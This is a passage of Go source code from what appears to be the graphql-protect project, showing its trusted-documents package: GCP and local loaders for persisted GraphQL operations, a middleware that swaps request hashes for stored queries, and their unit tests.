prometheus.NewGaugeVec(prometheus.GaugeOpts{ 20 | Namespace: "graphql_protect", 21 | Subsystem: "persisted_operations", 22 | Name: "gcs_loader_files_loaded_count", 23 | Help: "number of files downloaded using gcs loader", 24 | ConstLabels: nil, 25 | }, 26 | []string{}) 27 | ) 28 | 29 | // GcpStorageLoader loads persisted operations from a GCP Storage bucket. 30 | // It matches files based on a `*.json` glob pattern and attempts to unmarshall them into 31 | // a persisted operations map structure 32 | type GcpLoader struct { 33 | client *storage.Client 34 | bucket string 35 | log *slog.Logger 36 | } 37 | 38 | func (g *GcpLoader) Type() string { 39 | return "gcp" 40 | } 41 | 42 | func init() { 43 | prometheus.MustRegister(filesLoadedCounter) 44 | } 45 | 46 | func NewGcpLoader(cfg LoaderConfig, log *slog.Logger) (*GcpLoader, error) { 47 | client, err := storage.NewClient(context.Background()) 48 | if err != nil { 49 | return nil, err 50 | } 51 | 52 | return &GcpLoader{ 53 | client: client, 54 | bucket: cfg.Location, 55 | log: log, 56 | }, nil 57 | } 58 | func (g *GcpLoader) Load(ctx context.Context) (map[string]PersistedOperation, error) { 59 | it := g.client.Bucket(g.bucket).Objects(ctx, &storage.Query{ 60 | MatchGlob: "**.json", 61 | Versions: false, 62 | Projection: storage.ProjectionNoACL, 63 | }) 64 | 65 | numberOfFilesProcessed := 0 66 | 67 | result := map[string]PersistedOperation{} 68 | var errs []error 69 | for { 70 | attrs, err := it.Next() 71 | 72 | if errors.Is(err, iterator.Done) { 73 | break 74 | } 75 | if err != nil { 76 | // if any error is returned, any subsequent call returns the same error 77 | // so we break here 78 | errs = append(errs, err) 79 | break 80 | } 81 | 82 | data, err := g.processFile(ctx, attrs) 83 | if err != nil { 84 | errs = append(errs, err) 85 | } 86 | 87 | maps.Copy(result, data) 88 | 89 | numberOfFilesProcessed++ 90 | } 91 | 92 | g.log.Info("Loaded files from gcp bucket", "numFiles", numberOfFilesProcessed, "numErrs", len(errs)) 93 | filesLoadedCounter.WithLabelValues().Set(float64(numberOfFilesProcessed)) 94 | 95 | return result, errors.Join(errs...) 96 | } 97 | 98 | func (g *GcpLoader) processFile(ctx context.Context, attrs *storage.ObjectAttrs) (map[string]PersistedOperation, error) { 99 | ctx, cancel := context.WithTimeout(ctx, time.Second*50) 100 | defer cancel() 101 | 102 | reader, err := g.client.Bucket(g.bucket).Object(attrs.Name).NewReader(ctx) 103 | if err != nil { 104 | cancel() 105 | return nil, fmt.Errorf("Object(%q).NewReader: %w", attrs.Name, err) 106 | } 107 | defer reader.Close() 108 | 109 | data, err := io.ReadAll(reader) 110 | if err != nil { 111 | cancel() 112 | return nil, fmt.Errorf("io.Copy: %w", err) 113 | } 114 | 115 | operations, err := unmarshallPersistedOperations(data) 116 | 117 | for _, operation := range operations { 118 | if operation.Name == "" { 119 | g.log.Warn("Operation without operation name found!", "operation", operation) 120 | } 121 | } 122 | 123 | return operations, err 124 | } 125 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/loader.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // nolint:revive 2 | 3 | import ( 4 | "context" 5 | "log/slog" 6 | ) 7 | 8 | type Loader interface { 9 | Load(ctx context.Context) (map[string]PersistedOperation, error) 10 | Type() string 11 | } 12 | 13 | func NewLoaderFromConfig(cfg Config, log *slog.Logger) (Loader, error) { 14 | switch cfg.Loader.Type { 15 | case "local": 16 | return NewLocalDirLoader(cfg, log), nil 17 | case "gcp": 18 | return NewGcpLoader(cfg.Loader, log) 19 | default: 20 | log.Info("Loader strategy defaulted to noop loader for type", "type", cfg.Loader.Type) 21 | return NewNoOpLoader() 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/memory_loader.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // nolint:revive 2 | 3 | import ( 4 | "context" 5 | ) 6 | 7 | var _ Loader = &MemoryLoader{} 8 | 9 | // MemoryLoader is a loader for testing purposes 10 | // It allows the user to specify operations in memory 11 | type MemoryLoader struct { 12 | Store map[string]PersistedOperation 13 | } 14 | 15 | func (d *MemoryLoader) Type() string { 16 | return "memory" 17 | } 18 | 19 | func newMemoryLoader(store map[string]PersistedOperation) *MemoryLoader { 20 | return &MemoryLoader{ 21 | Store: store, 22 | } 23 | } 24 | 25 | func (d *MemoryLoader) Load(_ context.Context) (map[string]PersistedOperation, error) { 26 | return d.Store, nil 27 | } 28 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/model.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "regexp" 7 | ) 8 | 9 | // find the first word after the 'query' or 'mutation' keyword 10 | var operationNameRegexPattern = regexp.MustCompile(`\b(query|mutation)\s(\w+)`) 11 | 12 | type PersistedOperation struct { 13 | Operation string 14 | Name string `json:"name,omitempty"` 15 | } 16 | 17 | func unmarshallPersistedOperations(payload []byte) (map[string]PersistedOperation, error) { 18 | var manifestHashes map[string]string 19 | 20 | err := json.Unmarshal(payload, &manifestHashes) 21 | if err != nil { 22 | return nil, fmt.Errorf("error unmarshalling operation file, bytes: %d, contents: %s, error: %w", len(payload), string(payload), err) 23 | } 24 | 25 | data := make(map[string]PersistedOperation) 26 | 27 | for hash, operation := range manifestHashes { 28 | data[hash] = PersistedOperation{ 29 | Operation: operation, 30 | Name: extractOperationNameFromOperation(operation), 31 | } 32 | } 33 | return data, nil 34 | } 35 | 36 | func extractOperationNameFromOperation(payload string) string { 37 | match := operationNameRegexPattern.FindStringSubmatch(payload) 38 | 39 | // match[0] is the entire match 40 | // match[1] is either mutation/query 41 | // match[2] is the name of the operation 42 | if len(match) == 3 { 43 | return match[2] 44 | } 45 | return "" 46 | } 47 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/model_test.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments 2 | 3 | import ( 4 | "github.com/stretchr/testify/assert" 5 | "testing" 6 | ) 7 | 8 | func TestNewPersistedOperation(t *testing.T) { 9 | type args struct { 10 | operation string 11 | } 12 | tests := []struct { 13 | name string 14 | args args 15 | want string 16 | err error 17 | }{ 18 | { 19 | name: "extracts operation from query", 20 | args: args{ 21 | operation: "query ProductQuery{ product(id: 1) { id title as } }", 22 | }, 23 | want: "ProductQuery", 24 | }, 25 | { 26 | name: "extracts operation from mutation", 27 | args: args{ 28 | operation: "mutation ProductQuery{ product(id: 1) { id title as } }", 29 | }, 30 | want: "ProductQuery", 31 | }, 32 | { 33 | name: "no operation name when not present", 34 | args: args{ 35 | operation: "mutation { product(id: 1) { id title as } }", 36 | }, 37 | want: "", 38 | }, 39 | { 40 | name: "no operation name when no space between type and bracket", 41 | args: args{ 42 | operation: "mutation{ product(id: 1) { id title as } }", 43 | }, 44 | want: "", 45 | }, 46 | { 47 | name: "excludes operation arguments", 48 | args: args{ 49 | operation: "query Foobar($some: Int, $value: String){ product(id: 1) { id title as } }", 50 | }, 51 | want: "Foobar", 52 | }, 53 | { 54 | name: "no weird stuff when getting a completely malformed string", 55 | args: args{ 56 | operation: "", 57 | }, 58 | want: "", 59 | }, 60 | { 61 | name: "handles white space around operation name", 62 | args: args{ 63 | operation: "query Foobar ($some: Int, $value: String){ product(id: 1) { id title as } }", 64 | }, 65 | want: "Foobar", 66 | }, 67 | { 68 | name: "error is thrown on non parseable queries", 69 | args: args{ 70 | operation: "invalidQueryString", 71 | }, 72 | want: "", 73 | }, 74 | { 75 | name: "Can deal with fragments inside a query", 76 | args: args{ 77 | operation: "fragment BaseItem on MenuItem { action { menuItemActionType url } id imageUrl level measurement { clickedMenuItem } title } query MenuItems($country: String!, $id: String, $language: String!, $levels: String) { menuItems(country: $country, language: $language, id: $id, levels: $levels) { children { children { ...BaseItem } ...BaseItem } imageHeaderUrl level ...BaseItem } }", 78 | }, 79 | want: "MenuItems", 80 | }, 81 | } 82 | for _, tt := range tests { 83 | t.Run(tt.name, func(t *testing.T) { 84 | operation := extractOperationNameFromOperation(tt.args.operation) 85 | assert.Equalf(t, tt.want, operation, "newPersistedOperation(%v)", tt.args.operation) 86 | }) 87 | } 88 | } 89 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/nooploader.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments 2 | 3 | import "context" 4 | 5 | var _ Loader = &NoOpLoader{} 6 | 7 | type NoOpLoader struct { 8 | } 9 | 10 | func (n *NoOpLoader) Type() string { 11 | return "noop" 12 | } 13 | 14 | func NewNoOpLoader() (*NoOpLoader, error) { 15 | return &NoOpLoader{}, nil 16 | } 17 | 18 | func (n *NoOpLoader) Load(_ context.Context) (map[string]PersistedOperation, error) { 19 | return nil, nil 20 | } 21 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/persisted_operations.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // nolint:revive 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "encoding/json" 7 | "errors" 8 | "fmt" 9 | "github.com/supportivefe/graphql-protect/internal/business/gql" 10 | "github.com/supportivefe/graphql-protect/internal/business/validation" 11 | "github.com/prometheus/client_golang/prometheus" 12 | "github.com/vektah/gqlparser/v2/gqlerror" 13 | "io" 14 | "log/slog" 15 | "net/http" 16 | "sync" 17 | "time" 18 | ) 19 | 20 | var ( 21 | persistedOpsCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 22 | Namespace: "graphql_protect", 23 | Subsystem: "persisted_operations", 24 | Name: "result_count", 25 | Help: "The results of the persisted operations rule", 26 | }, 27 | []string{"state", "result"}, 28 | ) 29 | loadingResultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 30 | Namespace: "graphql_protect", 31 | Subsystem: "persisted_operations", 32 | Name: "load_result_count", 33 | Help: "Counter tracking loading behavior and results", 34 | }, 35 | []string{"type", "result"}, 36 | ) 37 | uniqueHashesInMemGauge = prometheus.NewGaugeVec(prometheus.GaugeOpts{ 38 | Namespace: "graphql_protect", 39 | Subsystem: "persisted_operations", 40 | Name: "unique_hashes_in_memory_count", 41 | Help: "number of unique hashes in memory", 42 | }, []string{}, 43 | ) 44 | ) 45 | 46 | type ReloadFailureStrategy string 47 | 48 | var ReloadFailureStrategyIgnore ReloadFailureStrategy = "ignore-failure" 49 | var ReloadFailureStrategyReject ReloadFailureStrategy = "reject-on-failure" 50 | 51 | type ErrorPayload struct { 52 | Errors gqlerror.List `json:"errors"` 53 | } 54 | 55 | type ErrorMessage struct { 56 | Message string `json:"message"` 57 | } 58 | 59 | type Config struct { 60 | Enabled bool `yaml:"enabled"` 61 | EnableDebugEndpoint bool `yaml:"enable_debug_endpoint"` 62 | RejectOnFailure bool `yaml:"reject_on_failure"` 63 | Loader LoaderConfig `yaml:"loader"` 64 | } 65 | 66 | func DefaultConfig() Config { 67 | return Config{ 68 | Enabled: false, 69 | RejectOnFailure: true, 70 | Loader: LoaderConfig{ 71 | Type: "local", 72 | Location: "./store", 73 | Reload: struct { 74 | Enabled bool `yaml:"enabled"` 75 | Interval time.Duration `yaml:"interval"` 76 | Timeout time.Duration `yaml:"timeout"` 77 | }(struct { 78 | Enabled bool 79 | Interval time.Duration 80 | Timeout time.Duration 81 | }{ 82 | Enabled: true, 83 | Interval: 5 * time.Minute, 84 | Timeout: 10 * time.Second, 85 | }), 86 | }, 87 | } 88 | } 89 | 90 | type LoaderConfig struct { 91 | Type string `yaml:"type"` 92 | Location string `yaml:"location"` 93 | // Configuration for auto-reloading persisted operations 94 | Reload struct { 95 | Enabled bool `yaml:"enabled"` 96 | Interval time.Duration `yaml:"interval"` 97 | Timeout time.Duration `yaml:"timeout"` 98 | } 99 | } 100 | 101 | var ErrNoLoaderSupplied = errors.New("no remoteLoader supplied") 102 | var ErrNoHashFound = errors.New("no hash found") 103 | var ErrPersistedQueryNotFound = errors.New("PersistedQueryNotFound") 104 | var ErrPersistedOperationNotFound = errors.New("PersistedOperationNotFound") 105 | var ErrReloadIntervalTooShort = errors.New("load interval cannot be less than 10 seconds") 106 | 107 | type Handler struct { 108 | log *slog.Logger 109 | cfg Config 110 | // this has the opportunity to grow indefinitely, might wat to replace with a fixed-cap cache 111 | // or something like an LRU with a TTL 112 | cache map[string]PersistedOperation 113 | refreshTicker *time.Ticker 114 | refreshLock sync.Mutex 115 | 116 | loader Loader 117 | done chan bool 118 | lock sync.RWMutex 119 | } 120 | 121 | func init() { 122 | prometheus.MustRegister(persistedOpsCounter, loadingResultCounter, uniqueHashesInMemGauge) 123 | } 124 | 125 | func NewPersistedOperations(log *slog.Logger, cfg Config, loader Loader) (*Handler, error) { 126 | if loader == nil { 127 | return nil, ErrNoLoaderSupplied 128 | } 129 | 130 | if cfg.Loader.Reload.Enabled && cfg.Loader.Reload.Interval < 10*time.Second { 131 | return nil, ErrReloadIntervalTooShort 132 | } 133 | 134 | refreshTicker := func() *time.Ticker { 135 | if !cfg.Loader.Reload.Enabled { 136 | return nil 137 | } 138 | return time.NewTicker(cfg.Loader.Reload.Interval) 139 | }() 140 | // buffered in case we don't have reloading enabled 141 | done := make(chan bool, 1) 142 | 143 | poh := &Handler{ 144 | log: log, 145 | cfg: cfg, 146 | cache: map[string]PersistedOperation{}, 147 | loader: loader, 148 | refreshTicker: refreshTicker, 149 | done: done, 150 | lock: sync.RWMutex{}, 151 | refreshLock: sync.Mutex{}, 152 | } 153 | 154 | err := poh.load(ReloadFailureStrategyIgnore) 155 | if err != nil { 156 | return nil, err 157 | } 158 | 159 | poh.reloadProcessor() 160 | 161 | return poh, nil 162 | } 163 | 164 | // SwapHashForQuery runs of the persisted operations handler 165 | // it uses the configuration supplied to decide its behavior 166 | func (p *Handler) SwapHashForQuery(next http.Handler) http.Handler { // nolint:funlen,cyclop 167 | fn := func(w http.ResponseWriter, r *http.Request) { 168 | if !p.cfg.Enabled || r.Method != "POST" { 169 | next.ServeHTTP(w, r) 170 | return 171 | } 172 | 173 | var errs gqlerror.List 174 | 175 | payload, err := gql.ParseRequestPayload(r) 176 | if err != nil { 177 | p.log.Warn("error decoding payload", "err", err) 178 | next.ServeHTTP(w, r) 179 | return 180 | } 181 | 182 | for i, data := range payload { 183 | if !p.cfg.RejectOnFailure && data.Query != "" { 184 | persistedOpsCounter.WithLabelValues("unknown", "allowed").Inc() 185 | continue 186 | } 187 | 188 | hash, err := hashFromPayload(data) 189 | if err != nil { 190 | persistedOpsCounter.WithLabelValues("error", "rejected").Inc() 191 | errs = append(errs, gqlerror.Wrap(ErrPersistedQueryNotFound)) 192 | continue 193 | } 194 | 195 | p.lock.RLock() 196 | operation, ok := p.cache[hash] 197 | p.lock.RUnlock() 198 | 199 | if !ok { 200 | // hash not found, fail 201 | persistedOpsCounter.WithLabelValues("unknown", "rejected").Inc() 202 | errs = append(errs, gqlerror.Wrap(ErrPersistedOperationNotFound)) 203 | continue 204 | } 205 | 206 | // update the original data 207 | payload[i].Query = operation.Operation 208 | payload[i].Extensions.PersistedQuery = nil 209 | payload[i].OperationName = operation.Name 210 | 211 | persistedOpsCounter.WithLabelValues("known", "allowed").Inc() 212 | } 213 | 214 | if len(errs) > 0 { 215 | // if any error occurred we fail 216 | res, _ := json.Marshal(ErrorPayload{ 217 | Errors: errs, 218 | }) 219 | http.Error(w, string(res), 200) 220 | return 221 | } 222 | 223 | var bts []byte 224 | // forward batched request 225 | if len(payload) > 1 { 226 | bts, err = json.Marshal(payload) 227 | if err != nil { 228 | // handle 229 | next.ServeHTTP(w, r) 230 | return 231 | } 232 | } else if len(payload) == 1 { 233 | // forward regular request 234 | bts, err = json.Marshal(payload[0]) 235 | if err != nil { 236 | // handle 237 | next.ServeHTTP(w, r) 238 | return 239 | } 240 | } 241 | 242 | // overwrite request body with new payload 243 | r.Body = io.NopCloser(bytes.NewBuffer(bts)) 244 | r.ContentLength = int64(len(bts)) 245 | 246 | next.ServeHTTP(w, r) 247 | } 248 | return http.HandlerFunc(fn) 249 | } 250 | 251 | func (p *Handler) GetTrustedDocuments() map[string]PersistedOperation { 252 | return p.cache 253 | } 254 | 255 | func (p *Handler) Validate(validate func(operation string) gqlerror.List) []validation.Error { 256 | var errs []validation.Error 257 | for hash, operation := range p.cache { 258 | err := validate(operation.Operation) 259 | 260 | if len(err) > 0 { 261 | valErr := validation.Wrap(err) 262 | valErr.Hash = hash 263 | errs = append(errs, valErr) 264 | } 265 | } 266 | 267 | return errs 268 | } 269 | 270 | func (p *Handler) load(failureStrategy ReloadFailureStrategy) error { 271 | newState, err := p.loader.Load(context.Background()) 272 | if err != nil { 273 | p.log.Error("error loading persisted operations", "err", err) 274 | loadingResultCounter.WithLabelValues(p.loader.Type(), "failure").Inc() 275 | if failureStrategy == ReloadFailureStrategyReject { 276 | return err 277 | } 278 | // implicit fall through for other failure types 279 | } 280 | 281 | p.lock.Lock() 282 | p.cache = newState 283 | p.lock.Unlock() 284 | 285 | p.log.Info(fmt.Sprintf("Total number of unique operation hashes: %d", len(newState))) 286 | uniqueHashesInMemGauge.WithLabelValues().Set(float64(len(newState))) 287 | 288 | loadingResultCounter.WithLabelValues(p.loader.Type(), "success").Inc() 289 | 290 | return nil 291 | } 292 | 293 | func (p *Handler) reloadProcessor() { 294 | if !p.cfg.Loader.Reload.Enabled { 295 | return 296 | } 297 | 298 | go func() { 299 | for { 300 | select { 301 | case <-p.done: 302 | return 303 | case <-p.refreshTicker.C: 304 | if !p.refreshLock.TryLock() { 305 | p.log.Warn("Refresh ticker still running while next tick") 306 | continue 307 | } 308 | err := p.load(ReloadFailureStrategyReject) 309 | p.refreshLock.Unlock() 310 | if err != nil { 311 | continue 312 | } 313 | } 314 | } 315 | }() 316 | } 317 | 318 | func (p *Handler) Shutdown() { 319 | p.done <- true 320 | } 321 | 322 | func hashFromPayload(payload gql.RequestData) (string, error) { 323 | if payload.Extensions.PersistedQuery == nil { 324 | return "", ErrNoHashFound 325 | } 326 | 327 | hash := payload.Extensions.PersistedQuery.Sha256Hash 328 | if hash == "" { 329 | return "", ErrNoHashFound 330 | } 331 | 332 | return hash, nil 333 | } 334 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/persisted_operations_test.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // nolint:revive 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "encoding/json" 7 | "errors" 8 | "github.com/supportivefe/graphql-protect/internal/business/gql" 9 | "github.com/stretchr/testify/assert" 10 | "io" 11 | "log/slog" 12 | "net/http" 13 | "net/http/httptest" 14 | "testing" 15 | ) 16 | 17 | func TestNewPersistedOperations(t *testing.T) { 18 | type args struct { 19 | cfg Config 20 | payload []byte 21 | cache map[string]PersistedOperation 22 | } 23 | tests := []struct { 24 | name string 25 | args args 26 | want func(t *testing.T) http.Handler 27 | resWant func(t *testing.T, res *http.Response) 28 | }{ 29 | { 30 | name: "does nothing if middleware is disabled", 31 | args: args{ 32 | cfg: Config{ 33 | Enabled: false, 34 | }, 35 | }, 36 | want: func(_ *testing.T) http.Handler { 37 | fn := func(_ http.ResponseWriter, _ *http.Request) { 38 | } 39 | return http.HandlerFunc(fn) 40 | }, 41 | resWant: func(_ *testing.T, _ *http.Response) { 42 | 43 | }, 44 | }, 45 | { 46 | name: "Allows unpersisted requests if configured", 47 | args: args{ 48 | cfg: Config{ 49 | Enabled: true, 50 | RejectOnFailure: true, 51 | }, 52 | payload: func() []byte { 53 | data := gql.RequestData{ 54 | Query: "query { foo }", 55 | } 56 | bts, _ := json.Marshal(data) 57 | return bts 58 | }(), 59 | }, 60 | want: func(t *testing.T) http.Handler { 61 | fn := func(_ http.ResponseWriter, r *http.Request) { 62 | decoder := json.NewDecoder(r.Body) 63 | 64 | var payload gql.RequestData 65 | err := decoder.Decode(&payload) 66 | assert.NoError(t, err) 67 | 68 | assert.Equal(t, "query { foo }", payload.Query) 69 | } 70 | return http.HandlerFunc(fn) 71 | }, 72 | resWant: func(t *testing.T, res *http.Response) { 73 | assert.Equal(t, 200, res.StatusCode) 74 | }, 75 | }, 76 | { 77 | name: "Returns error if no hash match is found and unpersisted operations are not allowed", 78 | args: args{ 79 | cfg: Config{ 80 | Enabled: true, 81 | RejectOnFailure: false, 82 | }, 83 | payload: func() []byte { 84 | data := gql.RequestData{ 85 | Extensions: gql.Extensions{ 86 | PersistedQuery: &gql.PersistedQuery{ 87 | Sha256Hash: "foobar", 88 | }, 89 | }, 90 | } 91 | bts, _ := json.Marshal(data) 92 | return bts 93 | }(), 94 | 95 | cache: map[string]PersistedOperation{}, 96 | }, 97 | want: func(_ *testing.T) http.Handler { 98 | fn := func(_ http.ResponseWriter, _ *http.Request) { 99 | 100 | } 101 | return http.HandlerFunc(fn) 102 | }, 103 | resWant: func(t *testing.T, res *http.Response) { 104 | assert.Equal(t, 200, res.StatusCode) 105 | 106 | decoder := json.NewDecoder(res.Body) 107 | 108 | var payload ErrorPayload 109 | err := decoder.Decode(&payload) 110 | assert.NoError(t, err) 111 | 112 | assert.Equal(t, "PersistedOperationNotFound", payload.Errors[0].Message) 113 | }, 114 | }, 115 | { 116 | name: "Swaps in query payload if hash operation is known, updates content length accordingly", 117 | args: args{ 118 | cfg: Config{ 119 | Enabled: true, 120 | RejectOnFailure: false, 121 | }, 122 | payload: func() []byte { 123 | data := gql.RequestData{ 124 | Extensions: gql.Extensions{ 125 | PersistedQuery: &gql.PersistedQuery{ 126 | Sha256Hash: "foobar", 127 | }, 128 | }, 129 | } 130 | bts, _ := json.Marshal(data) 131 | return bts 132 | }(), 133 | cache: map[string]PersistedOperation{ 134 | "foobar": newPersistedOperation("query { foobar }"), 135 | }, 136 | }, 137 | want: func(t *testing.T) http.Handler { 138 | fn := func(_ http.ResponseWriter, r *http.Request) { 139 | decoder := json.NewDecoder(r.Body) 140 | 141 | var payload gql.RequestData 142 | err := decoder.Decode(&payload) 143 | assert.NoError(t, err) 144 | 145 | assert.Equal(t, "query { foobar }", payload.Query) 146 | assert.Equal(t, int64(44), r.ContentLength) 147 | 148 | length, _ := json.Marshal(payload) 149 | 150 | assert.Equal(t, 44, len(length)) 151 | } 152 | return http.HandlerFunc(fn) 153 | }, 154 | resWant: func(t *testing.T, res *http.Response) { 155 | assert.Equal(t, 200, res.StatusCode) 156 | }, 157 | }, 158 | { 159 | name: "Swaps in batched query payload if hash operation is known, updates content length accordingly", 160 | args: args{ 161 | cfg: Config{ 162 | Enabled: true, 163 | RejectOnFailure: false, 164 | }, 165 | payload: func() []byte { 166 | data := []gql.RequestData{ 167 | { 168 | Extensions: gql.Extensions{ 169 | PersistedQuery: &gql.PersistedQuery{ 170 | Sha256Hash: "foobar", 171 | }, 172 | }, 173 | }, 174 | { 175 | Extensions: gql.Extensions{ 176 | PersistedQuery: &gql.PersistedQuery{ 177 | Sha256Hash: "baz", 178 | }, 179 | }, 180 | }, 181 | } 182 | bts, _ := json.Marshal(data) 183 | return bts 184 | }(), 185 | cache: map[string]PersistedOperation{ 186 | "foobar": newPersistedOperation("query { foobar }"), 187 | "baz": newPersistedOperation("query { baz }"), 188 | }, 189 | }, 190 | want: func(t *testing.T) http.Handler { 191 | fn := func(_ http.ResponseWriter, r *http.Request) { 192 | payload, err := io.ReadAll(r.Body) 193 | assert.NoError(t, err) 194 | 195 | assert.Equal(t, `[{"query":"query { foobar }","extensions":{}},{"query":"query { baz }","extensions":{}}]`, string(payload)) 196 | assert.Equal(t, int64(len(payload)), r.ContentLength) 197 | } 198 | return http.HandlerFunc(fn) 199 | }, 200 | resWant: func(t *testing.T, res *http.Response) { 201 | assert.Equal(t, 200, res.StatusCode) 202 | }, 203 | }, 204 | { 205 | name: "fails entire batch if one operation is unknown", 206 | args: args{ 207 | cfg: Config{ 208 | Enabled: true, 209 | RejectOnFailure: false, 210 | }, 211 | payload: func() []byte { 212 | data := []gql.RequestData{ 213 | { 214 | Extensions: gql.Extensions{ 215 | PersistedQuery: &gql.PersistedQuery{ 216 | Sha256Hash: "foobar", 217 | }, 218 | }, 219 | }, 220 | { 221 | Extensions: gql.Extensions{ 222 | PersistedQuery: &gql.PersistedQuery{ 223 | Sha256Hash: "baz", 224 | }, 225 | }, 226 | }, 227 | } 228 | bts, _ := json.Marshal(data) 229 | return bts 230 | }(), 231 | cache: map[string]PersistedOperation{ 232 | "foobar": newPersistedOperation("query { foobar }")}, 233 | }, 234 | want: func(t *testing.T) http.Handler { 235 | fn := func(_ http.ResponseWriter, _ *http.Request) { 236 | assert.Fail(t, "should not reach here") 237 | } 238 | return http.HandlerFunc(fn) 239 | }, 240 | resWant: func(t *testing.T, res *http.Response) { 241 | assert.Equal(t, 200, res.StatusCode) 242 | payload, err := io.ReadAll(res.Body) 243 | assert.NoError(t, err) 244 | assert.Equal(t, "{\"errors\":[{\"message\":\"PersistedOperationNotFound\"}]}\n", string(payload)) 245 | }, 246 | }, 247 | } 248 | for _, tt := range tests { 249 | t.Run(tt.name, func(t *testing.T) { 250 | log := slog.Default() 251 | po, _ := NewPersistedOperations(log, tt.args.cfg, newMemoryLoader(tt.args.cache)) 252 | po.cache = tt.args.cache 253 | 254 | req := httptest.NewRequest("POST", "/", bytes.NewBuffer(tt.args.payload)) 255 | resp := httptest.NewRecorder() 256 | 257 | po.SwapHashForQuery(tt.want(t)).ServeHTTP(resp, req) 258 | res := resp.Result() 259 | defer res.Body.Close() 260 | 261 | tt.resWant(t, res) 262 | }) 263 | } 264 | } 265 | 266 | func TestLoader(t *testing.T) { 267 | type args struct { 268 | state map[string]PersistedOperation 269 | loader Loader 270 | failureStrategy ReloadFailureStrategy 271 | } 272 | tests := []struct { 273 | name string 274 | args args 275 | want map[string]PersistedOperation 276 | wantErr error 277 | }{ 278 | { 279 | name: "loader state is added to cache", 280 | args: args{ 281 | loader: func() Loader { 282 | data := map[string]PersistedOperation{} 283 | data["123"] = PersistedOperation{ 284 | Operation: "i am an operation", 285 | Name: "i am a name", 286 | } 287 | 288 | loader := newMemoryLoader(data) 289 | 290 | return loader 291 | }(), 292 | state: map[string]PersistedOperation{}, 293 | failureStrategy: ReloadFailureStrategyReject, 294 | }, 295 | want: map[string]PersistedOperation{ 296 | "123": { 297 | Operation: "i am an operation", 298 | Name: "i am a name", 299 | }, 300 | }, 301 | wantErr: nil, 302 | }, 303 | { 304 | name: "loader state overwrites cache, does not append", 305 | args: args{ 306 | loader: func() Loader { 307 | data := map[string]PersistedOperation{} 308 | data["123"] = PersistedOperation{ 309 | Operation: "i am an operation", 310 | Name: "i am a name", 311 | } 312 | 313 | loader := newMemoryLoader(data) 314 | 315 | return loader 316 | }(), 317 | state: map[string]PersistedOperation{ 318 | "456": { 319 | Operation: "i am an operation that does get deleted", 320 | Name: "i am a name that doest get deleted", 321 | }, 322 | }, 323 | failureStrategy: ReloadFailureStrategyReject, 324 | }, 325 | want: map[string]PersistedOperation{ 326 | "123": { 327 | Operation: "i am an operation", 328 | Name: "i am a name", 329 | }, 330 | }, 331 | wantErr: nil, 332 | }, 333 | { 334 | name: "loader error does not update cache with failure mode reject", 335 | args: args{ 336 | loader: func() Loader { 337 | loader := &testLoader{ 338 | err: errors.New("this is unexpected"), 339 | willReturnError: false, 340 | } 341 | 342 | return loader 343 | }(), 344 | state: map[string]PersistedOperation{ 345 | "456": { 346 | Operation: "i am an operation that does not get deleted", 347 | Name: "i am a name that doest not get deleted", 348 | }, 349 | }, 350 | failureStrategy: ReloadFailureStrategyReject, 351 | }, 352 | want: map[string]PersistedOperation{ 353 | "456": { 354 | Operation: "i am an operation that does not get deleted", 355 | Name: "i am a name that doest not get deleted", 356 | }, 357 | }, 358 | wantErr: errors.New("this is unexpected"), 359 | }, 360 | { 361 | name: "loader error does update cache with failure mode ignore", 362 | args: args{ 363 | loader: func() Loader { 364 | loader := &testLoader{ 365 | err: errors.New("this is unexpected"), 366 | data: map[string]PersistedOperation{ 367 | "123": { 368 | Operation: "i am an operation", 369 | Name: "i am a name", 370 | }, 371 | }, 372 | willReturnError: false, 373 | } 374 | 375 | return loader 376 | }(), 377 | state: map[string]PersistedOperation{ 378 | "456": { 379 | Operation: "i am an operation that does not get deleted", 380 | Name: "i am a name that doest not get deleted", 381 | }, 382 | }, 383 | failureStrategy: ReloadFailureStrategyIgnore, 384 | }, 385 | want: map[string]PersistedOperation{ 386 | "123": { 387 | Operation: "i am an operation", 388 | Name: "i am a name", 389 | }, 390 | }, 391 | wantErr: errors.New("this is unexpected"), 392 | }, 393 | } 394 | for _, tt := range tests { 395 | t.Run(tt.name, func(t *testing.T) { 396 | log := slog.Default() 397 | po, _ := NewPersistedOperations(log, Config{}, tt.args.loader) 398 | po.cache = tt.args.state 399 | 400 | err := po.load(tt.args.failureStrategy) 401 | if tt.wantErr != nil { 402 | assert.Error(t, tt.wantErr, err) 403 | } 404 | 405 | assert.Equal(t, tt.want, po.cache) 406 | }) 407 | } 408 | } 409 | 410 | var _ Loader = &testLoader{} 411 | 412 | // ErrorLoader is a loader for testing purposes 413 | type testLoader struct { 414 | data map[string]PersistedOperation 415 | err error 416 | willReturnError bool 417 | } 418 | 419 | func (e *testLoader) Type() string { 420 | return "error" 421 | } 422 | 423 | func newPersistedOperation(query string) PersistedOperation { 424 | return PersistedOperation{query, extractOperationNameFromOperation(query)} 425 | } 426 | 427 | func (e *testLoader) Load(_ context.Context) (map[string]PersistedOperation, error) { 428 | if e.willReturnError { 429 | return e.data, e.err 430 | } 431 | // return error after the first call 432 | e.willReturnError = true 433 | 434 | return e.data, nil 435 | } 436 | -------------------------------------------------------------------------------- /internal/business/validation/model.go: -------------------------------------------------------------------------------- 1 | package validation 2 | 3 | import ( 4 | "github.com/vektah/gqlparser/v2/gqlerror" 5 | ) 6 | 7 | type Error struct { 8 | Hash string `json:"-"` 9 | Err gqlerror.Error `json:"-"` 10 | } 11 | 12 | func (v Error) Error() string { 13 | if v.Hash != "" { 14 | return 